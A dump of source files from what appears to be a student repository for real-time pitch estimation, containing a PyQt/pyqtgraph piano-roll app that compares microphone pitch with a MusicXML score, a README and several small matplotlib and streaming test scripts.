time\n\nimport multiprocessing as mp\nimport queue\n\nfrom pysptk.sptk import swipe\nimport numpy as np\nimport math\n\nglobal BASE\nBASE = np.log(2**(1/12))\n\n\n\nclass RTSwipe:\n def __init__(self,RATE=48000,CHUNK=6000,minfreq=50,maxfreq=1500,threshold=0.25):\n self.minfreq=minfreq\n self.maxfreq=maxfreq\n self.threshold=threshold\n\n CHANNELS = 1\n self.RATE = RATE\n self.CHUNK = CHUNK#2*2048\n self.swipesPerChunk = math.floor(CHUNK/(RATE*0.02)) # 20 ms per swipe estimate\n FORMAT = pyaudio.paInt16\n self.cnt = 0\n tsave = 10\n\n self.t0 = time.time()\n self.t = self.t0\n\n self.sound = mp.Queue()\n self.times = mp.Queue()\n self.swipes = mp.Queue()\n self.shutDown = mp.Queue()\n\n self.audio= pyaudio.PyAudio()\n self.stream = self.audio.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=False,\n stream_callback=self.audioCallback,\n frames_per_buffer=self.CHUNK\n )\n self.process = mp.Process(target=self.swipeSound)\n self.process.start()\n\n print(\"Process started\")\n\n def audioCallback(self, in_data, frame_count, time_info, status):\n #print('in callback')\n sound = np.frombuffer(in_data,dtype=np.int16)\n times = np.linspace(self.t-self.t0,time.time()-self.t0,\n self.swipesPerChunk,True)\n self.t = time.time()\n self.sound.put(sound)\n self.times.put(times)\n #print(\"Sound len: \" + str(len(sound)))\n return(in_data,pyaudio.paContinue)\n\n def swipeSound(self):\n while True:\n if not self.shutDown.empty():\n break\n try:\n data = self.sound.get_nowait()\n except queue.Empty:\n #print('queue empty')\n time.sleep(0.04)\n else:\n #print(self.sound.empty())\n # self.cnt = 0\n #print('Data length: ', len(data))\n data = data.astype('float64')\n #print(len(data))\n t0 = time.perf_counter()\n sw = swipe(data, self.RATE, int(self.CHUNK/self.swipesPerChunk),\n min=self.minfreq, max=self.maxfreq,\n threshold=self.threshold)\n #print('swipe time: ', time.perf_counter()-t0)\n self.swipes.put(sw)\n #print('swipe length: ', len(sw))\n return True\n\n def getSwipes(self):\n if not self.swipes.empty():\n swipes = self.swipes.get_nowait()\n times = self.times.get_nowait()\n newSwipes = []\n newTimes = []\n for i in range(0,len(swipes)):\n if swipes[i] > 0:\n newSwipes.append(np.log(swipes[i]/8.17578)/BASE + 1/2)\n newTimes.append(times[i])\n return newSwipes, newTimes\n return [], []\n\n def exitHandler(self):\n print('in exit')\n self.audio.close(self.stream)\n self.shutDown.put(True)\n self.process.join()\n\n\nclass NotesWizard:\n def __init__(self, filePath):\n self.piece = converter.parse(filePath)\n\n self.timeSig = self.piece.flat.getElementsByClass(meter.TimeSignature)[0].numerator\n self.tempo = self.piece.flat.getElementsByClass(tempo.MetronomeMark)[0].number\n\n midimax = 0\n midimin = 9999\n t = 0\n for e in self.piece.flat.notesAndRests:\n setattr(e,\"time\",t)\n setattr(e,\"globBeat\",e.measureNumber+e.beat-2)\n if e.isNote:\n #print(e.pitch.midi)\n midimax = max(midimax,e.pitch.midi)\n midimin = min(midimin,e.pitch.midi)\n rect = pg.QtGui.QGraphicsRectItem(t, e.pitch.midi-1/2, e.seconds, 2**(1/12))\n rect.setPen(pg.mkPen((0, 0, 0, 100)))\n rect.setBrush(pg.mkBrush((127, 127, 127)))\n setattr(e,\"rect\",rect)\n t += e.seconds\n\n def getNotesAndRests(self):\n return self.piece.flat.notesAndRests\n\n def getTimeSig(self):\n return self.timeSig\n\n def getTempo(self):\n return self.tempo\n\n\nclass RollWindow(pg.GraphicsWindow):\n def __init__(self,sweeper,notesWizard,parent=None,updateInterval=20,timeWindow=10):\n super().__init__(parent=parent)\n 
self.notesWizard = notesWizard\n self.sweeper = sweeper\n self.updateInterval = updateInterval\n self.timeWindow = timeWindow\n self.t0 = time.time()\n self.t = 0\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.swipes = []\n self.times = []\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(updateInterval) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.update)\n\n timeSig = notesWizard.getTimeSig()\n tempo = notesWizard.getTempo()\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\")\n self.plotSwipe.setYRange(36, 83, padding=0)\n self.plotSwipe.setXRange(-timeWindow/2, timeWindow/2, padding=0)\n\n self.xAxisSwipe = self.plotSwipe.getAxis(\"bottom\")\n self.xAxisSwipe.setTickSpacing(major=60/tempo*timeSig, minor=60/tempo)\n self.yAxisSwipe = self.plotSwipe.getAxis(\"left\")\n self.rightAxisSwipe = self.plotSwipe.getAxis(\"right\")\n self.rightAxisSwipe.setTickSpacing(levels=[(12,-0.5), (1,-0.5)])\n\n majorTicks = []\n minorTicks = []\n for i in range(0,127):\n p = pitch.Pitch()\n p.midi = i\n if i%12==0:\n majorTicks.append((i-1/2, p.nameWithOctave))\n minorTicks.append((i-1/2, p.nameWithOctave))\n self.yAxisSwipe.setTicks([majorTicks,minorTicks])\n self.plotSwipe.showGrid(x=True, y=True, alpha=0.5)\n self.yAxisSwipe.setTickSpacing(levels=[(12,-0.5), (1,-0.5)])\n\n # Notes\n for e in notesWizard.getNotesAndRests():\n if e.isNote:\n self.plotSwipe.addItem(e.rect)\n # Swipe estimates\n self.plot_swipe_item = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,255,255), symbolSize=5, symbolPen=None)\n # Now line\n self.nowLine = pg.InfiniteLine(0,90)\n self.plotSwipe.addItem(self.nowLine)\n\n def update(self):\n newSwipes, newTimes = self.sweeper.getSwipes()\n self.swipes += newSwipes\n self.times += newTimes\n if len(self.swipes) > 0:\n self.plot_swipe_item.setData(self.times,self.swipes)\n dt = (time.time()-self.t0 - self.t)\n xRange = self.xAxisSwipe.range\n self.plotSwipe.setXRange(xRange[0]+dt, xRange[1]+dt, padding=0)\n self.t = time.time()-self.t0\n self.nowLine.setValue(self.t)\n\ndef main():\n app = QtWidgets.QApplication([])\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n sweeper = RTSwipe()\n wizard = NotesWizard(\"Vem_kan_segla.musicxml\")\n rollWindow = RollWindow(sweeper, wizard)\n app.aboutToQuit.connect(sweeper.exitHandler)\n rollWindow.show()\n rollWindow.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6839622855186462, "alphanum_fraction": 0.7051886916160583, "avg_line_length": 14.071428298950195, "blob_id": "d9c50ee036498408612ee9fd9c8b73b344d4d7a0", "content_id": "aff70d1458bc3514b2bd1881c0968b17bbc24b7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 424, "license_type": "no_license", "max_line_length": 56, "num_lines": 28, "path": "/README.md", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "# spektralmagi\n\n\n# Online pitch estimation:\n\npackages needed: \npysptk \nnumpy \npyaudio \nPyQt5 (or PyQt4 or pyside, with minor changes in code) \npyqtgraph \nmusic21 \n\nall available with pip install\n\n~~File to run at todays date (Mars 6th):\npitchrt.py~~\n\n~~file to run at todays date (April 27th):\npython/testpy/test7.py~~\n\nFile to run at todays date (May 3rd):\npython/app.py\n\n\nTodo: \nfix downsample?? \ntest crepe?? 
\n" }, { "alpha_fraction": 0.841269850730896, "alphanum_fraction": 0.841269850730896, "avg_line_length": 14.75, "blob_id": "6af8a45a9d847e20d3db613075b4488d849f426b", "content_id": "09ae8523419b5db767976f927f678733829b262e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63, "license_type": "no_license", "max_line_length": 18, "num_lines": 4, "path": "/python/testpy/audiothread.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import threading\nimport pyaudio\nimport numpy as np\nimport time\n" }, { "alpha_fraction": 0.5866526961326599, "alphanum_fraction": 0.6170510053634644, "avg_line_length": 20.68181800842285, "blob_id": "3f7953c2de6f05124b815e2f5acfdb54f6cefe44", "content_id": "1382fc1f325316f8b09e5da6b15c4e91a55b62aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2862, "license_type": "no_license", "max_line_length": 78, "num_lines": 132, "path": "/python/testpy/tcanvas2.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport multiprocessing as mp\nimport time\nimport pyaudio\n\n\n# global variables\nfig = plt.figure(1)\n# first sub-plot\nax1 = fig.add_subplot(211)\nline1, = ax1.plot([], [], lw=2)\nax1.grid()\nxdata1, ydata1 = [], []\n# second sub-plot\nax2 = fig.add_subplot(212)\nline2, = ax2.plot([], [], lw=2)\nax2.grid()\nxdata2, ydata2 = [], []\n\n# the multiprocessing queue\nq = mp.Queue()\n\nFORMAT = pyaudio.paInt16\nnbr_chunks = 4\nCHANNELS = 1\nRATE = 44100\n# self.CHUNK = int(loop*self.RATE)\nCHUNK = nbr_chunks * 2048\n\np = pyaudio.PyAudio()\nstream = p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=True,\n stream_callback=audio_callback,\n frames_per_buffer=CHUNK\n)\n\n# data generator in separate process\n# here would be your arduino data reader\n\n\ndef dataGen(output):\n data = np.frombuffer(stream.read(\n CHUNK, exception_on_overflow=False), dtype=np.int16)\n output.put((x, np.sin(x)))\n\n\ndef audio_callback(self, in_data, frame_count, time_info, status):\n data = np.frombuffer(in_data, dtype=np.int16)\n\n\n# update first subplot\ndef update1(data):\n # update the data\n t, y = data\n xdata1.append(t)\n ydata1.append(y)\n xmin, xmax = ax1.get_xlim()\n\n ymin, ymax = ax1.get_ylim()\n\n if t >= xmax:\n ax1.set_xlim(xmin, 2 * xmax)\n if y >= ymax:\n ax1.set_ylim(ymin, 2 * ymax)\n if y <= ymin:\n ax1.set_ylim(2 * ymin, ymax)\n line1.set_data(xdata1, ydata1)\n\n return line1,\n\n# update second subplot\n\n\ndef update2(data):\n # update the data\n t, y = data\n xdata2.append(t)\n ydata2.append(y)\n xmin, xmax = ax2.get_xlim()\n ymin, ymax = ax2.get_ylim()\n\n if t >= xmax:\n ax2.set_xlim(xmin, 2 * xmax)\n if y >= ymax:\n ax2.set_ylim(ymin, 2 * ymax)\n if y <= ymin:\n ax2.set_ylim(2 * ymin, ymax)\n line2.set_data(xdata2, ydata2)\n\n return line2,\n\n# called at each drawing frame\n\n\ndef run(data):\n # get data from queue, which is filled in separate process, blocks until\n # data is available\n data = q.get(block=True, timeout=.5)\n # put here your variable separation\n data1 = (2 * data[0], 3 * data[1])\n data2 = (data[0], data[1])\n # provide the data to the plots\n a = update1(data1)\n b = update2(data2)\n fig.canvas.draw()\n return a + b\n\n\nif __name__ == \"__main__\":\n # count of reader processes\n n_proc = 1\n # setup workers\n pool = [mp.Process(target=dataGen, 
args=(q,)) for x in range(n_proc)]\n for p in pool:\n p.daemon = True\n p.start()\n\n # wait a few sec for the process to become alive\n time.sleep(3)\n\n # start your drawing\n ani = animation.FuncAnimation(fig, run, frames=60, blit=True, interval=10,\n repeat=False)\n plt.show()\n\n print('done')\n" }, { "alpha_fraction": 0.6686747074127197, "alphanum_fraction": 0.6897590160369873, "avg_line_length": 16.473684310913086, "blob_id": "ddb576cd91f9387f8f42db7aab0ef482af122ce2", "content_id": "f4af931ed0525690450c6a7409033e957e57d56c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 332, "license_type": "no_license", "max_line_length": 34, "num_lines": 19, "path": "/python/testpy/teststream.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from streamplot import PlotManager\nimport numpy as np\nimport time\n\nlength = 10000\ncosts = np.arange(length)\n\nplt_mgr = PlotManager(\n\ttitle=\"plots\",\n\tnline=3)\n\nfor i in range(length):\n\tcost = costs[i]\n\tplt_mgr.add(\"cost\", cost)\n\tplt_mgr.add(\"time\", time.time())\n\tplt_mgr.add(\"time2\", time.time())\n\tplt_mgr.update()\n\nplt_mgr.close()\n" } ]
22
Mehal-MJ/MJMehal
https://github.com/Mehal-MJ/MJMehal
a38000b0ecdb6294605ff0cfec720c279e824240
41a85c85af0e93695d754cccbca73ee461dd904f
868df23217bc1bf8b0a14f3677812b5235904daf
refs/heads/master
2020-07-07T15:32:30.785046
2019-08-20T16:13:17
2019-08-20T16:13:17
203,391,070
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6551724076271057, "alphanum_fraction": 0.6551724076271057, "avg_line_length": 13.5, "blob_id": "d7b8f3555dfb4e2c97be7e0e7e2fc1c3f8468718", "content_id": "840e66d405b78f6de0d538f3c03779262b49af97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29, "license_type": "no_license", "max_line_length": 16, "num_lines": 2, "path": "/trial.py", "repo_name": "Mehal-MJ/MJMehal", "src_encoding": "UTF-8", "text": "print(\"MJ\")\nprint(\"Forever\")\n" } ]
1
ateoto/timetracker
https://github.com/ateoto/timetracker
67b0a722a379cc43ebb3c480aae1ed65c580d775
1a9012caa22b3ce947d3b77d2c9f48b853a345c4
25317c91d5fd3bff8d1528c083c25040965c5ff3
refs/heads/master
2021-01-22T04:54:14.675822
2014-02-16T22:02:20
2014-02-16T22:02:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5901749730110168, "alphanum_fraction": 0.590847909450531, "avg_line_length": 38.1315803527832, "blob_id": "24aaa90fe2c60e6f53a6712370264430290d8ce4", "content_id": "1147e13b04bc92a7bb55f0832cd1245e23bcdd1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 89, "num_lines": 38, "path": "/timetracker/__init__.py", "repo_name": "ateoto/timetracker", "src_encoding": "UTF-8", "text": "import argparse\n\nfrom .timetracker import TimeTracker\n\ndef process_commands():\n parser = argparse.ArgumentParser(description='Keep track of tasks and time.')\n parser.add_argument('action', help='Start/stop tracking, sync database to server.')\n parser.add_argument('taskname', nargs='?', help='Define a taskname to keep track of')\n\n parser.add_argument('--database', \n help='Specify a path for the database. You can also ' \\\n 'set the environment variable TT_DATABASE_PATH')\n\n parser.add_argument('--sync',\n help='TimeTracker will attempt to sync with the server. ' \\\n 'To avoid adding this everytime, you can set the environment '\\\n 'variable TT_ALLOW_SYNC to 1',\n action='store_true')\n\n parser.add_argument('--project',\n help='Specify a projectname to work on. To avoid ' \\\n 'setting this everytime, you can set the environment ' \\\n 'variable TT_PROJECT. Works well with virtualenv!')\n\n args = parser.parse_args()\n\n tt = TimeTracker(database_path=args.database, project=args.project)\n\n if args.action == 'start':\n tt.start(taskname=args.taskname)\n if args.action == 'stop':\n tt.stop(args.sync)\n if args.action == 'pause':\n tt.pause(args.sync)\n if args.action == 'status':\n tt.status()\n\n tt.close(sync=args.sync)" }, { "alpha_fraction": 0.6388888955116272, "alphanum_fraction": 0.6435185074806213, "avg_line_length": 26.0625, "blob_id": "68affae1fcb25f259d8ee85918d8eefa74ef5081", "content_id": "6e468e4cdde687c9501a6dee4d46d829172fb737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 432, "license_type": "no_license", "max_line_length": 64, "num_lines": 16, "path": "/setup.py", "repo_name": "ateoto/timetracker", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(\n name='TimeTracker',\n version='0.1',\n url='https://github.com/Ateoto/timetracker/',\n author='Matthew McCants',\n author_email='mattmccants@gmail.com',\n description=('A simple time tracking and management tool.'),\n license='BSD',\n packages=find_packages(),\n include_package_data=True,\n entry_points={'console_scripts': [\n 'tt = timetracker:process_commands',\n ]},\n)" }, { "alpha_fraction": 0.5263600945472717, "alphanum_fraction": 0.532568633556366, "avg_line_length": 34.86415100097656, "blob_id": "7bd4b78fd384768b12aa8547b498df4b58c4705b", "content_id": "30a80a2d95320b9d47eedbf54709a24949444811", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9503, "license_type": "no_license", "max_line_length": 197, "num_lines": 265, "path": "/timetracker/timetracker.py", "repo_name": "ateoto/timetracker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport datetime\nimport sqlite3\n\nclass Task:\n def __init__(self, rowid=None, projectid=None, name=None, starttime=None, stoptime=None, active=True, synced=False, paused=False):\n self.rowid = rowid\n self.projectid = projectid\n self.name = name\n self.starttime = starttime\n 
self.stoptime = stoptime\n self.active = active\n self.synced = synced\n self.paused = paused\n\n def _pretty_elapsed_time(self):\n if not self.stoptime:\n et = datetime.datetime.now() - self.starttime\n else:\n et = self.stoptime - self.starttime\n\n # Pretty Elapsed time: adapted from django.utils.timesince\n chunks = (\n (60 * 60, 'hours'),\n (60, 'minutes')\n )\n\n since = et.days * 24 * 60 * 60 + et.seconds\n for i, (seconds, name) in enumerate(chunks):\n count = since // seconds\n if count != 0:\n break\n pretty = \"%i %s\" % (count, name)\n\n if i + 1 < len(chunks):\n # Now get the second item\n seconds2, name2 = chunks[i + 1]\n count2 = (since - (seconds * count)) // seconds2\n if count2 != 0:\n pretty = \"%s, %i %s\" % (pretty, count2, name2) \n \n return pretty\n\n\n def start(self, connection):\n cursor = connection.execute('insert into tasks values(?,?,?,?,?,?,?)',\n self._tuple_values())\n connection.commit()\n self.rowid = cursor.lastrowid\n\n return self.rowid is not None\n\n def toggle_pause(self, connection):\n self.stoptime = datetime.datetime.now()\n self.active = False\n self.paused = not self.paused\n\n connection.execute('update tasks set stoptime=?, active=?, paused=? where rowid=?',\n (self.stoptime, self.active, self.paused, self.rowid))\n\n connection.commit()\n\n\n def stop(self, connection):\n self.stoptime = datetime.datetime.now()\n self.active = False\n self.paused = False\n\n connection.execute('update tasks set stoptime=?, active=?, paused=? where rowid=?',\n (self.stoptime, self.active, self.paused, self.rowid))\n\n connection.commit()\n\n def _tuple_values(self):\n return (self.projectid, \n self.name, \n self.starttime, \n self.stoptime, \n self.active, \n self.synced, \n self.paused)\n\n\n def __str__(self):\n return \"[%s] Elapsed Time: %s\" % (self.name, self._pretty_elapsed_time())\n\n def __repr__(self):\n return self.__str__()\n\nclass TimeTracker:\n def __init__(self, database_path=None, project=None):\n\n try:\n self.allow_sync = bool(int(os.getenv('TT_ALLOW_SYNC', default=False)))\n except ValueError:\n print('WARNING:')\n print('Please set TT_ALLOW_SYNC to 1 to allow syncing, or 0 to disallow syncing with the server.')\n print('Syncing has been disabled for this run.')\n self.allow_sync = False\n \n self.server = os.getenv('TT_SERVER_ADDRESS')\n self.api_token = os.getenv('TT_ACCESS_TOKEN')\n \n\n if project:\n # Command Line varianble takes precendence.\n self.projectname = project\n else:\n # Check the TT env variables\n tt_project = os.getenv('TT_PROJECT')\n if tt_project:\n self.projectname = tt_project\n else:\n # Are we in a virtual env?\n virtual_env = os.getenv('VIRTUAL_ENV')\n if virtual_env:\n self.projectname = os.path.basename(os.path.basename(virtual_env))\n else:\n # Just use the current working directory.\n self.projectname = os.path.basename(os.getcwd())\n\n # Set up directories, if they do not exist\n if database_path:\n if database_path == ':memory:':\n self.database_path = database_path\n else:\n self.database_path = os.path.abspath(database_path)\n if not os.path.exists(os.path.dirname(self.database_path)):\n os.makedirs(os.path.dirname(self.database_path))\n if not database_path:\n self.database_path = os.path.join(\n os.path.expanduser('~'), '.config', 'TimeTracker', 'tt.db')\n if not os.path.exists(os.path.dirname(self.database_path)):\n os.makedirs(os.path.dirname(self.database_path))\n\n\n self.con = sqlite3.connect(self.database_path, detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\n 
self.con.execute('create table if not exists ' \\\n 'projects(name text, created datetime)')\n \n self.con.execute('create table if not exists ' \\\n 'tasks(project integer, name text, starttime timestamp, ' \\\n 'stoptime timestamp, active boolean, synced boolean, paused boolean)')\n\n result = self.con.execute('select rowid, * from projects where name=?', (self.projectname,))\n row = result.fetchone()\n if row:\n self.project_id = row[0]\n else:\n result = self.con.execute('insert into projects values(?,?)', \n (self.projectname, datetime.datetime.now(),))\n self.project_id = result.lastrowid\n\n self.con.commit()\n\n def _get_tasks_by_taskname(self, taskname):\n result = self.con.execute('select rowid, * from tasks where name=?', (taskname,))\n results = list()\n for row in result:\n t = Task(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7])\n results.append(t)\n\n return results\n\n def _get_active_tasks(self):\n result = self.con.execute('select rowid, project, name, starttime as \"starttime [timestamp]\", stoptime as \"stoptime [timestamp]\", active, synced, paused from tasks where active=?', (True,))\n\n results = list()\n for row in result:\n t = Task(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7])\n results.append(t)\n\n return results\n\n def _get_paused_tasks(self):\n result = self.con.execute('select rowid, project, name, starttime as \"starttime [timestamp]\", stoptime as \"stoptime [timestamp]\", active, synced, paused from tasks where paused=?', (True,))\n\n results = list()\n for row in result:\n t = Task(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7])\n results.append(t)\n\n return results\n\n def _sync(self, task_rowid):\n pass\n\n def start(self, taskname=None):\n results = self._get_active_tasks()\n\n if len(results) > 0:\n if taskname in [task.name for task in results]:\n print('You are already working on that task.')\n else:\n for task in results:\n response = input('Do you want to pause %s? [Y/n]:' % (task.name))\n if response.lower() != 'n':\n self.toggle_pause()\n self.start(taskname)\n else:\n if not taskname:\n taskname = 'Working on %s' % (self.projectname)\n\n task = Task(projectid=self.project_id,\n name=taskname,\n starttime=datetime.datetime.now(),\n active=True,\n synced=False,\n paused=False)\n if task.start(self.con):\n print('Started %s' % (taskname))\n\n\n def pause(self, sync=False):\n results = self._get_active_tasks()\n\n for task in results:\n task.toggle_pause(self.con)\n print('Paused %s' % (task.name))\n\n def stop(self, sync=False):\n active_results = self._get_active_tasks()\n\n if len(active_results) > 0:\n for task in active_results:\n task.stop(self.con)\n\n print(\"%s completed in %s\" % (task.name, task._pretty_elapsed_time()))\n\n paused_results = self._get_paused_tasks()\n for task in paused_results:\n response = input(\"Would you like to resume %s? 
[Y/n]:\" % (task.name))\n if response.lower() != 'n':\n task.start(self.con)\n \n task.toggle_pause(self.con)\n else:\n # There are no active results, so we should stop paused tasks.\n paused_results = self._get_paused_tasks()\n for task in paused_results:\n task.stop(self.con)\n\n if len(active_results) == 0 and len(paused_results) == 0:\n print('There aren\\'t any active or paused tasks.')\n\n def status(self):\n results = self._get_active_tasks()\n results = results + self._get_paused_tasks()\n\n if len(results) > 0:\n for task in results:\n if task.paused:\n paused = ' [Paused]'\n else:\n paused = ''\n \n print('%s (%s)%s' % (task.name, task._pretty_elapsed_time(), paused))\n else:\n print('There are no active tasks.')\n\n def close(self, sync=False):\n #This is where we would sync everything before we close\n self.con.close()" }, { "alpha_fraction": 0.5656565427780151, "alphanum_fraction": 0.5687645673751831, "avg_line_length": 33.81081008911133, "blob_id": "ea66e65c917d72ace39b130a9247821a28157aa7", "content_id": "4593363785f4583f308546664f230c547e4f1278", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1287, "license_type": "no_license", "max_line_length": 75, "num_lines": 37, "path": "/timetracker/tests/test_actions.py", "repo_name": "ateoto/timetracker", "src_encoding": "UTF-8", "text": "import unittest\nimport sys\n\nfrom timetracker.timetracker import TimeTracker\n\n\nclass TestActions(unittest.TestCase):\n def setUp(self):\n self.tt = TimeTracker(database_path=':memory:', project='test')\n\n def tearDown(self):\n pass\n\n def test_get_active_tests_no_tasks(self):\n tasks = self.tt._get_active_tasks()\n self.assertEqual(len(tasks), 0)\n\n def test_add_task(self):\n self.tt.start('test task')\n if not hasattr(sys.stdout, \"getvalue\"):\n self.fail(\"Please run in Buffer mode '--buffer'\")\n \n output = sys.stdout.getvalue().strip()\n self.assertEqual(output, 'Started test task')\n tasks = self.tt._get_active_tasks()\n self.assertIn('test task', [task.name for task in tasks])\n\n def test_stop_task(self):\n self.tt.start('test task')\n self.tt.stop()\n if not hasattr(sys.stdout, \"getvalue\"):\n self.fail(\"Please run in Buffer mode '--buffer'\")\n\n output = sys.stdout.getvalue().strip().split('\\n')[1]\n self.assertEqual(output, 'test task completed in 0 minutes')\n tasks = self.tt._get_active_tasks()\n self.assertEqual(len(tasks), 0)" }, { "alpha_fraction": 0.7240793108940125, "alphanum_fraction": 0.7274787425994873, "avg_line_length": 23.52777862548828, "blob_id": "d369d47a24e5e0887e8ec822b793ade2c872564c", "content_id": "8cbdd24523584cf191736ff8a1bc92633b25e68e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1765, "license_type": "no_license", "max_line_length": 305, "num_lines": 72, "path": "/README.rst", "repo_name": "ateoto/timetracker", "src_encoding": "UTF-8", "text": "TimeTracker\n===========\n\nTimeTracker (tt) is a python task management tool. Developed primarily out of my own needs as a consultant and a procrastinator.\n\nInstallation\n============\n\nUse pip to install TimeTracker into your virtualenv.\n\n.. code-block:: bash\n\n\t$ pip install -e https://github.com/Ateoto/timetracker.git\n\nUsage\n=====\n\nLets track our time in a project!\n\n.. 
code-block:: bash\n\n\t$ tt start \"Working on easing installation\"\n\nThat's it, TimeTracker is now tracking how long it's taken you to fix this broken install process.\n\nOk, I've fixed the install process (just for the sake of example).\nCommit the changes to your repo and then:\n\n.. code-block:: bash\n\t\n\t$ tt stop\n\t$ Working on easing installation completed. Elapsed Time: 20 minutes\n\nYou can also see a list of active tasks.\n\n.. code-block:: bash\n\n\t$ tt status\n\tNew task (0 minutes)\n\tOld task (2 minutes) [Paused]\n\n\nThere is a special case for pausing tasks, it flags the task in the database and the program will ask if you'd like to continue it after you stop your current task. TimeTracker will prompt you to pause active tasks if you try to start a new task with another task open. You can also manually pause a task.\n\n.. code-block:: bash\n\n\t$ tt status\n\tCurrent task (10 minutes)\n\t$ tt pause \"Current task\"\n\tPaused Current task\n\nThere is a lot more to come.\n\nTests\n=====\n\nThis is still a work in progress, but it is a top priority for me.\n\n.. code-block:: bash\n\n\t$ git clone https://github.com/Ateoto/timetracker.git\n\t$ cd timetracker\n\t$ python -m unittest discover\n\n\nFeatures\n========\n\n - Uses an sqlite database to keep track of active and closed tasks.\n - Simple implementation.\n - Simple API.\n - Coming Soon: Integration with a Django project to allow fine grained views on time management." } ]
5
Latrazil/projetCorrecteurQCM
https://github.com/Latrazil/projetCorrecteurQCM
871fff66409fca65b703be6a057159ad146a3468
32791c0d7a532e7405cfde872aa3744ffa1128b2
802b3a3073bd8409b3b56f1268cc7802a2cbcb8e
refs/heads/master
2022-11-14T15:20:20.755370
2020-07-13T12:56:55
2020-07-13T12:56:55
279,301,131
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6765533089637756, "alphanum_fraction": 0.6984278559684753, "avg_line_length": 60.00934600830078, "blob_id": "7cfa7a11b30d247b8767c99e340a072960e24a34", "content_id": "b0f8afe68ff51f833882b5ea08e8857a53acde78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40342, "license_type": "no_license", "max_line_length": 290, "num_lines": 642, "path": "/Correcteur QCM - Copie/projetCorrecteur_avancé.py", "repo_name": "Latrazil/projetCorrecteurQCM", "src_encoding": "UTF-8", "text": "from tkinter import*#J'importe les modules dont j'aurais besoin\r\nimport operator as op#Je raccourcis operator en op \r\nimport math#J'importe math pour faire des opérations complexes\r\nlAlan = ['Alan','A','D','Z','C','C','B','Z','D']\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\ndef points(reponse,solution):\r\n \"\"\" Cette fonction permet d'atribuer les points aux élèves en fonction de leurs réponses \"\"\"\r\n if reponse==solution:#Je regarde si la solution est égale à la réponse de l'élève(réponse exacte), si oui je retourne 3\r\n return 3\r\n elif reponse!=solution:\r\n if reponse=='Z':#sinon je demande si la reponse est égale à Z(absence de réponse), si oui je retourne 0\r\n return 0\r\n else:# sinon, si la réponse est fausse, je retourne -1\r\n return -1\r\n \r\n\r\ndef corrige (lrep,lsol):\r\n \"\"\" Cette fonction retourne une liste avec les points des élèves et leurs prénoms \"\"\"\r\n # en tout premier je crée une liste vide dans laquelle je vais mettre mon résultat\r\n resultat = []\r\n # ensuite j'y ajoute le prénom de l'élève\r\n resultat.append(lrep[0])\r\n for i in range(1,len(lrep)): # je parcours le reste de ma liste\r\n reponse = lrep[i]#J'attribue l'élément à la position i à l'intérieur de ma liste de reponses de l'élève à une variable reponse\r\n solution = lsol[i]#J'attribue l'élément à la position i à l'intérieur de ma liste de solution à une variable solution\r\n score = points(reponse,solution)#J'attribue ce que retourne la fonction points à une variable score que j'insers ensuite à résultat\r\n resultat.append(score)\r\n return resultat# Je retourne résultat\r\n\r\nl=['Alan',3,-1,0,3,3,3,0,3]\r\ndef note (lpoints):\r\n \"\"\" Cette fonction renvoie la note totale à l'aide des points \"\"\"\r\n somme=0#J'initialise une variable somme à zéro qui sera ma note\r\n for i in range(1,len(lpoints)):# Je parcours ma liste en excluant le prénom\r\n somme+=lpoints[i]#J'additionne à somme les points à l'index i de ma liste de points\r\n return somme#Je retourne somme soit la note\r\n\r\ndef reponseFausse(lpoints):\r\n \"\"\" Cette fonction retourne la liste des index des réponses fausses \"\"\"\r\n rf=[]#J'initialise une liste vide nommée rf pour Réponses Fausses\r\n rf.append(lpoints[0])#J'y ajoute le prénom de l'élève\r\n for i in range(1,len(lpoints)):#Je parcours le reste de la liste de points\r\n if lpoints[i]!=3:#Si le point à l'index i n'est pas égale à 3, une bonne réponse, alors on ajoute l'index i à la liste rf\r\n rf.append(i)\r\n return rf # Je retourne la liste des réponses fausses\r\n\r\n\r\n# partie 2\r\n\r\ngrille = [ ['Alan','A','D','Z','C','C','B','Z','D'] ,\r\n 